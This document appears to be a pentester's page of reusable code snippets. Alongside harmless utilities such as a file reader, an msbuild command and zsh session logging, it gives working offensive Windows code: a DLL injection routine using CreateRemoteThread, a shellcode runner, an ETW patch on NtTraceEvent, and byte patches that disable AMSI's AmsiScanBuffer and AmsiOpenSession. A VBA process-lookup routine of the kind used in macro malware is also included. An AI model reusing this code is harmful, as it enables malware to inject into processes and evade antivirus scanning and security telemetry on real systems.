Code snippets

Table of content

C printf DEBUG macro

#define DEBUG(x, ...) printf(x, ##__VA_ARGS__)

Read a full file

void readFile(char* filename, char** string) {
    FILE* f = fopen(filename, "rb");
    if (!f) {
        printf("Cannot open the file\n");
        return;
    }
    fseek(f, 0, SEEK_END);
    size_t fsize = ftell(f);
    fseek(f, 0, SEEK_SET);

    *string = (char*)malloc(fsize + 1);
    if (!*string) {
        printf("Cannot allocate string buffer");
        return;
    }
    fread(*string, fsize, 1, f);
    fclose(f);

    (*string)[fsize] = 0;
}

NtCurrentProcess

#define NtCurrentProcess() ( (HANDLE)(LONG_PTR) -1 )

Typedef NTDLL functions

typedef NTSTATUS(NTAPI *pNtSetInformationProcess)(
    HANDLE ProcessHandle,
    PROCESS_INFORMATION_CLASS ProcessInformationClass,
    PVOID ProcessInformation,
    ULONG ProcessInformationLength
    );

Inject DLL in process

#include <windows.h>
#include <stdio.h>

BOOL injectDLL(char *moduleToInject, DWORD processPID) {
    // open the target process
    HANDLE processHandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, processPID);

    // allocate the memory page to inject the DLL path
    void* remoteBuffer = VirtualAllocEx(processHandle, NULL, strlen(moduleToInject) * sizeof(char), MEM_COMMIT, PAGE_READWRITE);
    if (!remoteBuffer) {
        return FALSE;
    }

    // inject the dll name
    BOOL status = WriteProcessMemory(processHandle, remoteBuffer, (LPVOID)moduleToInject, strlen(moduleToInject) * sizeof(char), NULL);
    if (!status) {
        return FALSE;
    }

    // load the dll with LoadLibraryW
    HMODULE kernel32 = GetModuleHandleA("Kernel32.dll");
    if (!kernel32) {
        return FALSE;
    }
    PTHREAD_START_ROUTINE threadRoutine = (PTHREAD_START_ROUTINE)GetProcAddress(kernel32, "LoadLibraryA");
    if (!threadRoutine) {
        return FALSE;
    }
    HANDLE dllThread = CreateRemoteThread(processHandle, NULL, 0, threadRoutine, remoteBuffer, 0, NULL);
    if (!dllThread) {
        return FALSE;
    }
    WaitForSingleObject(dllThread, 1000);
    return TRUE;
}

Run shellcode

((void(*)())entrypointAddress)();

Patch ETW

void patchETW(){
    Pvoid NtTraceEvent = GetProcAddress(GetModuleHandle("ntdll.dll"), "NtTraceEvent");
    DWORD dwOld;
    DWORD retPatch = 0xc3;
    VirtualProtect((DWORD64)NtTraceEvent + 3, 1, PAGE_EXECUTE_READWRITE, &dwOld);
    CopyMemory((DWORD64)NtTraceEvent + 3, &retPatch, 1);
    VirtualProtect((DWORD64)NtTraceEvent + 3, 1, dwOld, &dwOld);
}

Patch AMSI

void patchAMSI(OUT HANDLE& hProc) {

    void* amsiAddr = GetProcAddress(LoadLibraryA("amsi.dll"), "AmsiScanBuffer");

    char amsiPatch[] = { 0x31, 0xC0, 0x05, 0x4E, 0xFE, 0xFD, 0x7D, 0x05, 0x09, 0x02, 0x09, 0x02, 0xC3 };

    DWORD lpflOldProtect = 0;
    unsigned __int64 memPage = 0x1000;
    void* amsiAddr_bk = amsiAddr;


    NtProtectVirtualMemory(hProc, (PVOID*)&amsiAddr_bk, (PSIZE_T)&memPage, 0x04, &lpflOldProtect);
    NtWriteVirtualMemory(hProc, (LPVOID)amsiAddr, (PVOID)amsiPatch, sizeof(amsiPatch), (SIZE_T*)nullptr);
    NtProtectVirtualMemory(hProc, (PVOID*)&amsiAddr_bk, (PSIZE_T)&memPage, lpflOldProtect, &lpflOldProtect);
}
void patchAMSIOpenSession(OUT HANDLE& hProc) {

    void* amsiAddr = GetProcAddress(LoadLibraryA("amsi.dll"), "AmsiOpenSession");

    char amsiPatch[] = { 0x48, 0x31, 0xC0 };

    DWORD lpflOldProtect = 0;
    unsigned __int64 memPage = 0x1000;
    void* amsiAddr_bk = amsiAddr;

    NtProtectVirtualMemory(hProc, (PVOID*)&amsiAddr_bk, (PSIZE_T)&memPage, 0x04, &lpflOldProtect);
    NtWriteVirtualMemory(hProc, (LPVOID)amsiAddr, (PVOID)amsiPatch, sizeof(amsiPatch), (SIZE_T*)nullptr);
    NtProtectVirtualMemory(hProc, (PVOID*)&amsiAddr_bk, (PSIZE_T)&memPage, lpflOldProtect, &lpflOldProtect);
}

Get process handle by name

C

#include <TlHelp32.h>

HANDLE getProcHandlebyName(LPCWCHAR procName, DWORD* PID) {
    PROCESSENTRY32 entry;
    entry.dwSize = sizeof(PROCESSENTRY32);
    NTSTATUS status = NULL;
    HANDLE hProc = 0;

    HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, NULL);
    if (Process32First(snapshot, &entry)) {
        do {
            if (wcscmp((entry.szExeFile), procName) == 0) {
                *PID = entry.th32ProcessID;
                HANDLE hProc = OpenProcess(PROCESS_ALL_ACCESS, FALSE, *PID);

                if (!hProc) {
                    continue;
                }
                return hProc;
            }
        } while (Process32Next(snapshot, &entry));
    }

    return NULL;
}

VBA

Private Declare PtrSafe Function CreateToolhelp32Snapshot Lib "kernel32" (ByVal lFlags As Long, ByVal lProcessID As Long) As Long
Private Declare PtrSafe Function Process32First Lib "kernel32" (ByVal hSnapshot As Long, PE32 As PROCESSENTRY32) As Long
Private Declare PtrSafe Function Process32Next Lib "kernel32" (ByVal hSnapshot As Long, PE32 As PROCESSENTRY32) As Long


Private Function PIDByProcName(ProcName As String) As Integer
    Dim PE32 As PROCESSENTRY32
    Dim Proc_Name As String
    Dim hSnapshot As Long
    Dim lRet As Long
    Dim PID As Integer

    hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0&)

    If hSnapshot <> INVALID_HANDLE_VALUE Then
        PE32.dwSize = Len(PE32)
        lRet = Process32First(hSnapshot, PE32)

        Do While lRet
            Dim comp As Integer
            comp = InStr(1, PE32.szExeFile, ProcName, vbBinaryCompare)
            If comp > 0 Then
                PIDByProcName = PE32.th32ProcessID
                Exit Function
            End If

            lRet = Process32Next(hSnapshot, PE32)
        Loop
        CloseHandle hSnapshot
    End If
End Function

Build MS project from command line

msbuild -p:Configuration=Release -t:Clean,Build

Auto timeline

Add in the .zshrc

preexec() { echo ">> Date : `date +%d.%m.%y-%H:%M:%S`\n"; }

Add in the .zshenv

if [[ ${SHLVL} -eq 1 ]]; then
    script ~/.script/`date +%d.%m.%y-%H:%M:%S`-`echo $((1 + $RANDOM % 1000))`
fi

results matching ""

    No results matching ""

    results matching ""

      No results matching ""